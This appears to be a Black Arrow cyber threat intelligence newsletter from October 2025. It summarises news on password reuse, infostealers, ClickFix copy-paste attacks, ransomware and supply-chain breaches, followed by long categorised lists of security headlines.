A new report highlights a gap between perceived cyber security strength and actual readiness. Many organisations believe they are well protected, yet lack basic controls such as multi-factor authentication and incident response testing. The analysis shows that overconfidence can lead to underinvestment in critical areas. Experts urge boards to validate their assumptions through independent assessments and to ensure that cyber security is governed like other enterprise risks. The findings reinforce the need for leadership accountability and continuous improvement.

Source: https://professionalsecurity.co.uk/products/cyber/confidence-and-reality/

Threat Actors Exploiting Faster Than Businesses Can Respond

Threat actors are now exploiting vulnerabilities within days of discovery, leaving businesses with little time to react. The article outlines how attackers use automation and AI to identify and weaponise weaknesses rapidly. Business leaders are urged to shorten patch cycles, improve threat intelligence sharing, and rehearse incident response. The piece emphasises that cyber resilience is no longer just a technical issue but a leadership challenge requiring proactive governance and investment in agility.

Source: https://www.itpro.com/security/cyber-attacks/threat-actors-exploiting-quickly-what-business-leaders-should-do

Millions Still Use One Password Across Multiple Accounts

A new study reveals that millions of users continue to rely on a single password for multiple accounts, despite years of awareness campaigns. The report finds that 31% of respondents reuse passwords across work and personal platforms, creating major risks for credential stuffing and account takeover. The article calls for stronger enforcement of password policies and wider adoption of password managers. It also highlights the need for leadership to model good behaviour and ensure staff receive regular training.

Source: https://cybernews.com/security/millions-use-one-password/

Microsoft Warns of Sharp Rise in Identity Attacks Driven by Password Theft

Microsoft has reported a 32% increase in identity-based cyber attacks in the first half of 2025, with over 97% involving password-based methods. According to its latest Digital Defense Report, attackers are increasingly using stolen credentials to impersonate employees or contractors, often leading to data theft and ransomware deployment. Infostealer malware and help desk scams are key tactics, with groups like Scattered Spider exploiting these methods. Microsoft also highlighted its efforts to disrupt threats such as Lumma Stealer and cracked Cobalt Strike tools. IT firms and government bodies remain top targets, while ransomware actors are increasingly abusing antivirus exclusions to bypass defences.

Source: https://therecord.media/microsoft-warns-of-surge-identity-hacks-passwords

Insider Risks Cause Data Loss in 77% of Organisations

A study finds that 77% of organisations have experienced data loss due to insider risks, including negligent or malicious behaviour. Security leaders cite lack of visibility and poor access controls as key contributors. The report stresses the importance of behavioural monitoring, role-based access, and staff awareness programmes. Insider threats are often overlooked compared to external attacks, yet they pose significant operational and reputational risks. Boards are advised to treat insider risk as a strategic issue requiring cross-functional governance.

Source: https://www.securitymagazine.com/articles/101964-security-leaders-share-why-77-organizations-lose-data-due-to-insider-risks

AI-Driven Threats Are Top Concern for Cyber Professionals in 2026

New research from ISACA finds that AI-driven threats are the biggest concern for cyber security professionals heading into 2026. The survey reveals that 62% of respondents expect AI to increase the volume and sophistication of attacks. Concerns include deepfakes, automated phishing, and AI-powered malware. The report also notes a gap in preparedness, with only 38% of organisations confident in their ability to defend against AI-enabled threats. The findings call for urgent investment in AI-aware defences and leadership engagement on emerging risks.

Source: https://www.businesswire.com/news/home/20251020612551/en/AI-Driven-Cyber-Threats-Are-the-Biggest-Concern-for-Cybersecurity-Professionals-Going-Into-2026-Finds-New-ISACA-Research

Infostealers Are Reshaping the Cyber Security Landscape

Infostealers are a type of malware designed to silently collect credentials, session tokens and sensitive data from infected devices. These tools are increasingly used by attackers to bypass multi-factor authentication and gain persistent access to cloud services. Unlike ransomware, infostealers operate quietly, often going undetected while harvesting data for later use or sale. The rise of malware-as-a-service has made infostealers widely accessible, with criminal groups offering subscription models. Experts urge organisations to monitor for unusual login patterns and to implement stronger endpoint protection. The trend reflects a shift from disruptive attacks to silent data theft.

Source: https://betanews.com/2025/10/22/how-infostealers-have-changed-the-cybersecurity-landscape/

How ClickFix Attackers Trick You to Attack Yourself and Bypass Your Security

ClickFix is an attack method that pretends to be a fix for a broken page or a CAPTCHA, but in reality tricks users into copying and pasting malicious code from their browser clipboard. These attacks bypass email filters and rely on SEO poisoning and malvertising to lure victims. SEO poisoning involves attackers manipulating search engine results so that malicious websites appear high in search rankings, often mimicking legitimate help pages or software fixes. Once executed, the code runs locally and often evades endpoint detection. ClickFix has been linked to ransomware groups and state actors, with recent incidents affecting healthcare and municipal systems. The attack uses obfuscated JavaScript and legitimate-looking sites, making detection difficult.

Source: https://www.thehackernews.com/2025/10/analysing-clickfix-3-reasons-why.html

Business Confidence in Ransomware Defence Is High, But Readiness Is Low

A report finds a disconnect between business confidence and actual preparedness for ransomware attacks. While 70% of executives believe their organisations are well protected, only 35% have tested incident response plans. The report shows that attackers are evolving faster than defences, with double extortion and data theft now common tactics. The findings suggest that leadership needs to challenge its own evaluation and invest in practical resilience measures, including tabletop exercises and supplier coordination.

Source: https://www.crowdstrike.com/en-us/blog/ransomware-reality-business-confidence-is-high-preparedness-is-low/

Ransomware Payouts Surge to $36M in Recent Cases

New data shows that ransomware payouts have surged, with recent cases totalling $36M. Attackers use double extortion tactics, demanding payment not only to decrypt data but also to prevent public exposure. The report highlights that many victims are SMEs with limited recovery options. Experts warn that paying ransoms often leads to further demands and does not guarantee full restoration. The findings support calls for stronger backup strategies and rehearsals of how to manage being attacked.

Source: https://www.infosecurity-magazine.com/news/ransomware-payouts-surge-dollar36m/

Third-Party Breaches Escalate as Confidence Gap Widens Among Cyber Leaders

Experts warn that third-party and supply chain breaches are spiralling out of control, with 60% of UK and US leaders admitting the risks are too complex to manage. Despite 97% expressing confidence in breach response, 61% reported suffering a third-party attack in the past year. The IO State of Information Security Report highlights incidents such as those at Jaguar Land Rover and Collins Aerospace, showing how supply chain compromise can cause widespread disruption. Smaller firms are increasingly targeted, yet only 23% of leaders ranked supply chain compromise among their top emerging threats.

Source: https://www.emergingrisks.co.uk/third-party-breaches-out-of-control-experts-warn/

Governance, Risk and Compliance

"We Are Very Exposed": Does The UK Need A New Plan For Cyber-Attacks?

‘Attacks will get through’: head of GCHQ urges companies to do more to fight cybercrime | Cybercrime | The Guardian

UK: It’s Time to Act – The UK National Cyber Security Centre’s Wake-Up Call for Business Leaders | DLA Piper - JDSupra

Cyber security is business survival - NCSC.GOV.UK

‘I lost 25 pounds in 20 days’: what it’s like to be on the frontline of a global cyber-attack | Cybercrime | The Guardian

Confidence and reality | Professional Security Magazine

UK facing ‘most contested and complex’ threat in decades, warns GCHQ director | The Record from Recorded Future News

2025 Cyber Incident Trends: What Your Business Needs to Know | Mayer Brown - JDSupra

Why Political Risk Is Now A Top Threat For Companies

62% of Risk Leaders Say Trade Wars Could Trigger Cyberattacks, New Riskonnect Research Finds

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Payouts Surge to $3.6m Amid Evolving Tactics - Infosecurity Magazine

Ransomware Reality: Business Confidence Is High, Preparedness Is Low

Scattered Lapsus$ Hunters Signal Shift in Tactics - Infosecurity Magazine

Madman Theory Spurs Crazy Scattered Lapsus$ Hunters Playbook

Agenda Ransomware Deploys Linux Variant on Windows Systems Through Remote Management Tools and BYOVD Techniques | Trend Micro (US)

What Microsoft’s 2025 report reveals about the new rules of engagement in cyberdefense - Help Net Security

Warlock Ransomware: Old Actor, New Tricks? | SECURITY.COM

Japanese companies brace themselves for more attacks as cybercrimes climb | The Straits Times

Ransomware Victims

JLR hack 'is costliest cyber attack in UK history', experts say - BBC News

Jaguar Land Rover cyberattack could cost the UK almost £2B • The Register

UK Ministry of Defense Probes Military Contractor Data Leak

Hackers are now a serious risk to patients' lives as NHS records the first death due to a cyber crime | Daily Mail Online

UK vehicle output drops by 36% following JLR cyber attack | Autocar

From Airport chaos to cyber intrigue: Everest Gang takes credit for Collins Aerospace breach - Security Affairs

Japanese retailer Muji halted online sales after a ransomware attack on logistics partner

UK Data Protection Regulator Fines Capita ~$18.8 Million Following a Ransomware Attack | Alston & Bird - JDSupra

Golfwear giant allegedly targeted by Russian hackers | Cybernews

Phishing & Email Based Attacks

Analysing ClickFix: 3 Reasons Why Copy/Paste Attacks Are Driving Security Breaches

This new cyberattack tricks you into hacking yourself. Here's how to spot it | ZDNET

How AI is driving email phishing and how to beat the threat [Q&A] - BetaNews

Many IT leaders click phishing links — and some don’t report them | CIO Dive

New Phishing Attack Leverages Azure Blob Storage to Impersonate Microsoft

AWS outage expected to trigger phishing attacks Be prepared: AWS outage likely to trigger surge in phishing attacks | Cybernews

TikTok videos continue to push infostealers in ClickFix attacks

John Bolton charged over classified emails after Iranian hack of his AOL account

PhantomCaptcha ClickFix attack targets Ukraine war relief orgs

New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs

Other Social Engineering

Analysing ClickFix: 3 Reasons Why Copy/Paste Attacks Are Driving Security Breaches

AI Social Engineering Top Cyber Threat for 2026, ISACA Survey Reveals - Infosecurity Magazine

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Google and Check Point nuke massive YouTube malware network • The Register

Researchers track surge in high-level Smishing Triad activity | CyberScoop

TikTok videos continue to push infostealers in ClickFix attacks

Ukraine Aid Groups Targeted Through Fake Zoom Meetings and Weaponized PDF Files

Fraud, Scams and Financial Crime

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Google and Check Point nuke massive YouTube malware network • The Register

Researchers track surge in high-level Smishing Triad activity | CyberScoop

Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide

131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign

Myanmar Military Shuts Down Major Cybercrime Center and Detains Over 2,000 People - SecurityWeek

Man caught using suitcase ‘phone tower’ to target Victoria Line commuters with scam texts - My London

First conviction for promoting tax fraud on Instagram | HM Revenue & Customs (HMRC)

Cifas exposes dozens of email addresses in invite mishap • The Register

Artificial Intelligence

How AI is driving email phishing and how to beat the threat [Q&A] - BetaNews

Executives Fear AI Cyber Threats Could Outpace Defenses

AI-Driven Cyber Threats Are the Biggest Concern for Cybersecurity Professionals Going Into 2026, Finds New ISACA Research

AI-driven cybersecurity threats are now hitting businesses from every angle - here's how to stay safe | TechRadar

What Microsoft’s 2025 report reveals about the new rules of engagement in cyberdefense - Help Net Security

Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US - SecurityWeek

Cyber experts have been warning about AI-powered DDoS attacks – now they’re becoming a reality | IT Pro

Companies want the benefits of AI without the cyber blowback - Help Net Security

OpenAI's new Atlas browser may have some extremely concerning security issues, experts warn - here's what we know | TechRadar

Survey: Cybersecurity Teams Struggling to Keep Pace in the Age of AI - Security Boulevard

It Takes Only 250 Documents to Poison Any AI Model

AI Sidebar Spoofing Puts ChatGPT Atlas, Perplexity Comet and Other Browsers at Risk - SecurityWeek

Malware

How infostealers have changed the cybersecurity landscape - BetaNews

Lumma Stealer Vacuum Filled by Upgraded Vidar 2.0 Infostealer - Infosecurity Magazine

Threat Actors With Stealer Malwares Processing Millions of Credentials a Day - Cyber Security News

Why traditional bot defenses are failing in the age of intelligent automation | TechRadar

Google and Check Point nuke massive YouTube malware network • The Register

TikTok videos continue to push infostealers in ClickFix attacks

North Korean Hackers Combine BeaverTail and OtterCookie into Advanced JS Malware

Vidar Stealer 2.0 adds multi-threaded data theft, better evasion

Russia-linked COLDRIVER speeds up malware evolution after LOSTKEYS exposure

Cybercriminals turn to stealth to bypass malware detection - BetaNews

Security Teams Must Deploy Anti-Infostealer Defenses Now - Infosecurity Magazine

Google finds Russian state hackers replacing burned malware with new tools | The Record from Recorded Future News

Google ads for fake Homebrew, LogMeIn sites push infostealers

Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

Self-spreading GlassWorm malware hits OpenVSX, VS Code registries

Cyber-criminals turn on each other: the story of Lumma Stealer's collapse | Fortra

Iranian hackers targeted over 100 govt orgs with Phoenix backdoor

Official Xubuntu website compromised to serve malware - Help Net Security

New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs

Bots/Botnets

Why traditional bot defenses are failing in the age of intelligent automation | TechRadar

Mobile

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide

131 Chrome Extensions Caught Hijacking WhatsApp Web for Massive Spam Campaign

EU watchdog attacks Britain over iPhone ‘backdoor’ demand

Man caught using suitcase ‘phone tower’ to target Victoria Line commuters with scam texts - My London

Why Some Apps Ask for Contacts (and What They Actually Do With Them)

6 steps to increase Android security in the enterprise | TechTarget

Denial of Service/DoS/DDoS

Cyber experts have been warning about AI-powered DDoS attacks – now they’re becoming a reality | IT Pro

How to Detect and Mitigate Hit and Run DDoS Attacks - Security Boulevard

Cache poisoning vulnerabilities found in 2 DNS resolving apps - Ars Technica

Multiple Gitlab Security Vulnerabilities Let Attackers Trigger DoS Condition

Security patch or self-inflicted DDoS? Microsoft update knocks out key enterprise functions | CSO Online

Internet of Things – IoT

Is Your Car a BYOD Risk? Researchers Demonstrate How

Your smart building isn't so smart without security - Help Net Security

When everything's connected, everything's at risk - Help Net Security

Bombarding Cars With Lasers: Novel Auto Attacks Emerge

Data Breaches/Leaks

Over 266,000 F5 BIG-IP instances exposed to remote attacks

Hackers Had Been Lurking in Cyber Firm F5 Systems Since 2023

F5 Networks Breach: A Wake-Up Call for Supply Chain Cybersecurity - Security Boulevard

183 million email accounts just got compromised. Check if you're affected | PCWorld

ICO defends decision not to investigate MoD Afghan data leak • The Register

FinWise data breach shows why encryption is your last defense

John Bolton charged over classified emails after Iranian hack of his AOL account

UK Data Protection Regulator Fines Capita ~$18.8 Million Following a Ransomware Attack | Alston & Bird - JDSupra

MoD probes claims Russian hackers stole files on bases - BBC News

Foreign hackers breached a US nuclear weapons plant via SharePoint flaws | CSO Online

Cifas exposes dozens of email addresses in invite mishap • The Register

American Airlines Subsidiary Envoy Air Hit by Oracle Hack - SecurityWeek

Hundreds of masked ICE agents doxxed by hackers, as personal details posted on Telegram

Organised Crime & Criminal Actors

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Myanmar Military Shuts Down Major Cybercrime Center and Detains Over 2,000 People - SecurityWeek

Hackers Attacking Remote Desktop Protocol Services With 30,000+ New IP Addresses Daily

Russian Government Now Actively Managing Cybercrime Groups: Security Firm - SecurityWeek

Cyber-criminals turn on each other: the story of Lumma Stealer's collapse | Fortra

US Congress committee investigating Musk-owned Starlink over Myanmar scam centres | Myanmar | The Guardian

Not Just Spies: Satellite Operators Say Cybercrime Is Major Threat

Russia Pivots, Cracks Down on Resident Hackers

Ex-Uber CSO talks teen cyber crims, CISO role with The Reg • The Register

Insider Risk and Insider Threats

Security Leaders Share Why 77% Organizations Lose Data Due to Insider Risks | Security Magazine

Are we human or are we security risk? - BetaNews

Insurance

Cyber war perception hindering capital and market growth: Johansmeyer at Convergence - Artemis.bm

Supply Chain and Third Parties

JLR hack 'is costliest cyber attack in UK history', experts say - BBC News

When Big Doesn’t Mean Bulletproof: The Importance of Third-Party Service Provider Due Diligence | Jackson Lewis P.C. - JDSupra

The next cyber crisis may start in someone else's supply chain - Help Net Security

Third party breaches out of control experts warn

F5 Networks Breach: A Wake-Up Call for Supply Chain Cybersecurity - Security Boulevard

Jaguar Land Rover August hack cost UK economy $2.5 billion: Report | Company News - Business Standard

UK Ministry of Defense Probes Military Contractor Data Leak

Third-Party Breaches: Why Vendor Passwords Put Your Organization at Risk - Security Boulevard

Japanese retailer Muji halted online sales after a ransomware attack on logistics partner

American Airlines subsidiary Envoy confirms Oracle data theft attack

Cloud/SaaS

AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more

AWS Outage: Billions Lost, Multi-Cloud Is Wall Street’s Solution

Cybersecurity expert offers blunt verdict on AWS outage - TheStreet

AWS outage post-mortem fingers DNS as the culprit that took out a chunk of the internet and services for days — automation systems race and crash | Tom's Hardware

AWS outage exposes Achilles heel: central control plane • The Register

What the Huge AWS Outage Reveals About the Internet | WIRED

Amazon cloud outage fuels call for Europe to limit reliance on US tech – POLITICO

CyberCube estimates preliminary AWS outage loss range of $38-581m - Reinsurance News

Inside the messy reality of Microsoft 365 management - Help Net Security

Zoom isn't as private as you think. Here's how to lock it down | PCWorld

Foreign hackers breached a US nuclear weapons plant via SharePoint flaws | CSO Online

Outages

AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more

Cybersecurity expert offers blunt verdict on AWS outage - TheStreet

AWS outage exposes Achilles heel: central control plane • The Register

What the Huge AWS Outage Reveals About the Internet | WIRED

Amazon cloud outage fuels call for Europe to limit reliance on US tech – POLITICO

Security patch or self-inflicted DDoS? Microsoft update knocks out key enterprise functions | CSO Online

Identity and Access Management

Microsoft warns of a 32% surge in identity hacks, mainly driven by stolen passwords | The Record from Recorded Future News

Encryption

EU watchdog attacks Britain over iPhone ‘backdoor’ demand

FinWise data breach shows why encryption is your last defense

Linux and Open Source

Europe's plan to ditch US tech giants is built on open source - and it's gaining steam | ZDNET

Amazon cloud outage fuels call for Europe to limit reliance on US tech – POLITICO

Official Xubuntu website compromised to serve malware - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

Microsoft warns of a 32% surge in identity hacks, mainly driven by stolen passwords | The Record from Recorded Future News

Threat Actors With Stealer Malwares Processing Millions of Credentials a Day - Cyber Security News

Millions rely on just one password for everything | Cybernews

Third-Party Breaches: Why Vendor Passwords Put Your Organization at Risk - Security Boulevard

183 million email accounts just got compromised. Check if you're affected | PCWorld

Social Media

Google and Check Point nuke massive YouTube malware network • The Register

Dissecting YouTube’s Malware Distribution Network - Check Point Research

Don't be fooled by this massive YouTube scam network - how to protect yourself | ZDNET

TikTok videos continue to push infostealers in ClickFix attacks

First conviction for promoting tax fraud on Instagram | HM Revenue & Customs (HMRC)

Training, Education and Awareness

Phishing training needs a new hook — here’s how to rethink your approach | CSO Online

Regulations, Fines and Legislation

UK cyber law delays 'deeply concerning,' say MPs | The Record from Recorded Future News

Experian fined $3.2 million for mass-collecting personal data

EU watchdog attacks Britain over iPhone ‘backdoor’ demand

ICO defends decision not to investigate MoD Afghan data leak • The Register

UK Data Protection Regulator Fines Capita ~$18.8 Million Following a Ransomware Attack | Alston & Bird - JDSupra

US ‘slipping’ on cybersecurity, annual Cyberspace Solarium Commission report concludes | CyberScoop

Behind the struggle for control of the CVE program | CyberScoop

Trump pardons former Binance CEO after guilty plea in letting cybercrime proceeds flow through platform | The Record from Recorded Future News

The US government shutdown is a wake-up call for cyber self-reliance | Computer Weekly

Trump's workforce cuts blamed as America's cyber edge dulls • The Register

Models, Frameworks and Standards

Experian fined $3.2 million for mass-collecting personal data

Careers, Working in Cyber and Information Security

Future Cybersecurity Workforce: Beyond Degrees, Toward Durable Skills

Why ex-military professionals are a good fit for cybersecurity - Help Net Security

Hiring Won’t Fix the Cyber Talent Gap: Building a Self-Improving Workforce Will

Law Enforcement Action and Take Downs

Europol dismantles cybercrime network linked to $5.8M in financial losses | CyberScoop

Myanmar Military Shuts Down Major Cybercrime Center and Detains Over 2,000 People - SecurityWeek

Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide

US Congress committee investigating Musk-owned Starlink over Myanmar scam centres | Myanmar | The Guardian

Man caught using suitcase ‘phone tower’ to target Victoria Line commuters with scam texts - My London

Former Director at US Hacking Tool Provider May Have Sold Secrets to Russia

First conviction for promoting tax fraud on Instagram | HM Revenue & Customs (HMRC)

Three arrested in UK on suspicion of assisting Russian intelligence service | UK news | The Guardian

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

The Rise of Collaborative Tactics Among China-aligned Cyber Espionage Campaigns | Trend Micro (US)

Electronic Warfare Puts Commercial GPS Users on Notice

Cyberespionage campaign PassiveNeuron targets machines running Windows Server | Securelist

The UK military says Russia targets its satellites on a weekly basis. What can be done about it?

Are we already witnessing space warfare in action: 'This is not just posturing' | Space

Cyber war perception hindering capital and market growth: Johansmeyer at Convergence - Artemis.bm

China

Hackers Had Been Lurking in Cyber Firm F5 Systems Since 2023

The Rise of Collaborative Tactics Among China-aligned Cyber Espionage Campaigns | Trend Micro (US)

Microsoft Is Warning That Russia and China Are Increasingly Using AI to Mount Cyberattacks on the U.S.

Salt Typhoon Uses Citrix Flaw in Global Cyber-Attack - Infosecurity Magazine

Hackers Used Snappybee Malware and Citrix Flaw to Breach European Telecom Network

Reconfiguring U.S. Cyber Strategy in the Wake of Salt Typhoon | Lawfare

Researchers track surge in high-level Smishing Triad activity | CyberScoop

China accuses US of cyberattack on national time center | AP News

Russia

Russian Government Now Actively Managing Cybercrime Groups: Security Firm - SecurityWeek

Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US - SecurityWeek

Russia-linked COLDRIVER speeds up malware evolution after LOSTKEYS exposure

Google finds Russian state hackers replacing burned malware with new tools | The Record from Recorded Future News

The UK military says Russia targets its satellites on a weekly basis. What can be done about it?

MoD probes claims Russian hackers stole files on bases - BBC News

Teen Tied to Russian Hackers in Dutch Cyber Espionage Probe - Infosecurity Magazine

EU and Ukraine deepen cooperation on cyber security - EU NEIGHBOURS east

Former Director at US Hacking Tool Provider May Have Sold Secrets to Russia

Ukraine Aid Groups Targeted Through Fake Zoom Meetings and Weaponized PDF Files

Three arrested in UK on suspicion of assisting Russian intelligence service | UK news | The Guardian

PhantomCaptcha ClickFix attack targets Ukraine war relief orgs

From Airport chaos to cyber intrigue: Everest Gang takes credit for Collins Aerospace breach - Security Affairs

Russia-linked hackers claim responsibility for Collins Aerospace cyber attack - Defence Connect

Golfwear giant allegedly targeted by Russian hackers | Cybernews

Iran

John Bolton charged over classified emails after Iranian hack of his AOL account

MuddyWater Targets 100+ MEA Gov Entites With Backdoor

Iranian hackers targeted over 100 govt orgs with Phoenix backdoor

John Bolton indictment says suspected Iranian hackers accessed his emails, issued threats | CyberScoop

North Korea

North Korean Hackers Combine BeaverTail and OtterCookie into Advanced JS Malware

How Lazarus Group used fake job ads to spy on Europe's drone and defense sector - Help Net Security

Lazarus Group Hunts European Drone Manufacturing Data

The Leak That Targeted the Leakers

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

How Business Leaders Can Turn Geopolitical Uncertainty Into Strategic Opportunity

Tools and Controls

Why traditional bot defenses are failing in the age of intelligent automation | TechRadar

How infostealers have changed the cybersecurity landscape - BetaNews

Executives Fear AI Cyber Threats Could Outpace Defenses

AWS outage post-mortem fingers DNS as the culprit that took out a chunk of the internet and services for days — automation systems race and crash | Tom's Hardware

Hackers Attacking Remote Desktop Protocol Services With 30,000+ New IP Addresses Daily

Cybercriminals turn to stealth to bypass malware detection - BetaNews

Security Teams Must Deploy Anti-Infostealer Defenses Now - Infosecurity Magazine

Securing AI to Benefit from AI

OpenAI's new Atlas browser may have some extremely concerning security issues, experts warn - here's what we know | TechRadar

Network security devices endanger orgs with ’90s era flaws | CSO Online

Is EDR Giving You a False Sense of Security? - Infosecurity Magazine

Microsoft disables File Explorer preview for downloads to block attacks

Zero Trust Has a Blind Spot—Your AI Agents

When Your Backups Become the Target: Building Cyber Resilience That Lasts | Dell

Former Director at US Hacking Tool Provider May Have Sold Secrets to Russia

CISOs’ security priorities reveal an augmented cyber agenda | CSO Online

The CISO imperative: Building resilience in an era of accelerated cyberthreats | Microsoft Security Blog

China accuses US of cyberattack on national time center | AP News

Reports Published in the Last Week

Cyber resilience of UK digital infrastructure - POST

Other News

"We Are Very Exposed": Does The UK Need A New Plan For Cyber-Attacks?

UK: It’s Time to Act – The UK National Cyber Security Centre’s Wake-Up Call for Business Leaders | DLA Piper - JDSupra

Cyber security is business survival - NCSC.GOV.UK

UK facing ‘most contested and complex’ threat in decades, warns GCHQ director | The Record from Recorded Future News

Global cyber attacks spark legal wave hitting smaller organizations hardest | Insurance Business America

Cyber resilience of UK digital infrastructure - POST

Electronic Warfare Puts Commercial GPS Users on Notice

Not Just Spies: Satellite Operators Say Cybercrime Is Major Threat

The CISO imperative: Building resilience in an era of accelerated cyberthreats | Microsoft Security Blog

IT strategy needs proactive reboot | Professional Security Magazine

Why Political Risk Is Now A Top Threat For Companies

62% of Risk Leaders Say Trade Wars Could Trigger Cyberattacks, New Riskonnect Research Finds

New Cybercriminal Group Targeting Transportation and Logistics Industry – How to Protect Your Organization | Fisher Phillips - JDSupra

UK launches global cyber standards backed by international partners - UKTN

Vulnerability Management

Threat actors are exploiting flaws more quickly – here's what business leaders should do | IT Pro

Network security devices endanger orgs with ’90s era flaws | CSO Online

Behind the struggle for control of the CVE program | CyberScoop

Flawed Vendor Guidance Exposes Orgs to Avoidable Risk

Vulnerabilities

Over 266,000 F5 BIG-IP instances exposed to remote attacks

Flawed Vendor Guidance Exposes Orgs to Avoidable Risk

Microsoft fixes Windows bug breaking localhost HTTP connections

ConnectWise Patches Critical Flaw in Automate RMM Tool - SecurityWeek

Microsoft fixes one of its "highest ever" rated security flaws - here's what happened | TechRadar

Microsoft fixes Windows Server Active Directory sync issues

CISA: High-severity Windows SMB flaw now exploited in attacks

CISA Confirms Exploitation of Latest Oracle EBS Vulnerability - SecurityWeek

Oracle Releases October 2025 Patches - SecurityWeek

Windows Server emergency patches fix WSUS bug with PoC exploit

BIND Updates Address High-Severity Cache Poisoning Flaws - SecurityWeek

Cache poisoning vulnerabilities found in 2 DNS resolving apps - Ars Technica

Multiple Gitlab Security Vulnerabilities Let Attackers Trigger DoS Condition

Experts warn OpenAI’s ChatGPT Atlas has security flaws that could turn it against users—stealing sensitive data, downloading malware, or worse | Fortune

71,000+ WatchGuard Devices Vulnerable to Remote Code Execution Attacks

Researchers uncover remote code execution flaw in abandoned Rust code library | CyberScoop

Over 250 Magento Stores Hit Overnight as Hackers Exploit New Adobe Commerce Flaw

Salt Typhoon Uses Citrix Flaw in Global Cyber-Attack - Infosecurity Magazine

Hackers Used Snappybee Malware and Citrix Flaw to Breach European Telecom Network

Foreign hackers breached a US nuclear weapons plant via SharePoint flaws | CSO Online

TP-Link Patches Four Omada Gateway Flaws, Two Allow Remote Code Execution

Cursor, Windsurf IDEs riddled with 94+ n-day Chromium vulnerabilities

Microsoft fixes bug preventing users from opening classic Outlook

HP pulls update that broke Microsoft Entra ID auth on some AI PCs

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 19/10/2025 Black Arrow Admin 19/10/2025

Black Arrow Cyber Threat Intelligence Briefing 17 October 2025

Black Arrow Cyber Threat Intelligence Briefing 17 October 2025:

-CISOs Urged to Rethink Tabletop Exercises as Most Incidents Are Unrehearsed

-Co-op CEO: Cyber Responsibility Lies with Senior Leaders

-UK Government: Businesses Must Prepare for Total IT Failure

-UK Security Agency Reports Sharp Rise in Cyber Attacks

-Attackers Use Valid Credentials to Breach SonicWall VPNs

-F5 Networks Confirms Long-Term Breach by Government Hackers

-Extortion Group Publishes Data from Salesforce Customer Breaches

-Microsoft: Over Half of Cyber Attacks Driven by Extortion or Ransomware

-Ransomware Attacks Surge 36% in Q3

-North Korean Attackers Use Blockchain to Evade Detection

-Russian Cyber Attacks Against NATO States Rise by 25%

-US Authorities Seize $15 Billion in Bitcoin from Crypto Scam Network

Executive Summary

This week the UK government has given strong and clear instructions for all business leaders to plan for a cyber attack. In particular, businesses are urged to prepare for a total failure of their IT, and the CEO of UK retailer Co-op has shared her personal experience to reinforce the message, while the UK security agency reports a sharp rise in attacks.

The fallout of recent attacks is also in the media, including for users of SonicWall and Salesforce, and the continued effects of ransomware and other attacks including by nation states as well as by criminal gangs.

These themes highlight the need for cyber resilience as well as cyber security. Contact us to discuss how to achieve this in a proportionate way, including through our impartial incident response exercise simulations that are tailored to help you better manage an incident with your chosen IT and other control providers.

Governance, Risk and Compliance

Warning to UK following spike in online attacks | The Independent

China and Russia posing ‘significant threat’ to UK in cyberspace, NCSC warns | The Standard

UK hit by record number of ‘nationally significant’ cyberattacks | The Record from Recorded Future News

China poses 'highly sophisticated' cyber threat to UK, NCSC warns | UK News | Sky News

Ministers urge businesses to take cyber-attacks seriously - UKTN

Cyber-attacks rise by 50% in past year, UK security agency says | Cybercrime | The Guardian

UK security services step up work with business to fight cyber threats

Company bosses warned cyber attacks are 'not a question of if but when' | ITV News

UK Cyber Incidents Rise for Third Straight Year

Have plans on paper in case of cyber-attack, firms told - BBC News

Senior Execs Falling Short on Cyber-Attack Preparedness, NCSC Warns - Infosecurity Magazine

Move to hybrid working creates cyber risks – study

CISOs must rethink the tabletop, as 57% of incidents have never been rehearsed | CSO Online

Legacy IT warning as UK hit with twice as many ‘nationally significant’ cyberattacks in past year – PublicTechnology

Government urges businesses to keep paper back-ups for cyber-attack recovery | AccountingWEB

Threats

Ransomware, Extortion and Destructive Attacks

Q3 ransomware attacks up 36 percent year-on-year - BetaNews

Salesforce bandits run into hiding amid arrests, seizures • The Register

Extortion and ransomware drive over half of cyberattacks - Microsoft On the Issues

FBI takedown banner appears on BreachForums site as Scattered Spider promotes leak | The Record from Recorded Future News

LockBit, Qilin, DragonForce form ransomware cartel | Cybernews

Third time lucky? The FBI just took down BreachForums, again | IT Pro

Scattered Lapsus$ Hunters extortion site goes dark: What’s next? | CSO Online

Qilin Ransomware announced new victims

Microsoft Revokes 200 Fraudulent Certificates Used in Rhysida Ransomware Campaign

Microsoft disrupts ransomware attacks targeting Teams users

Ransomware Victims

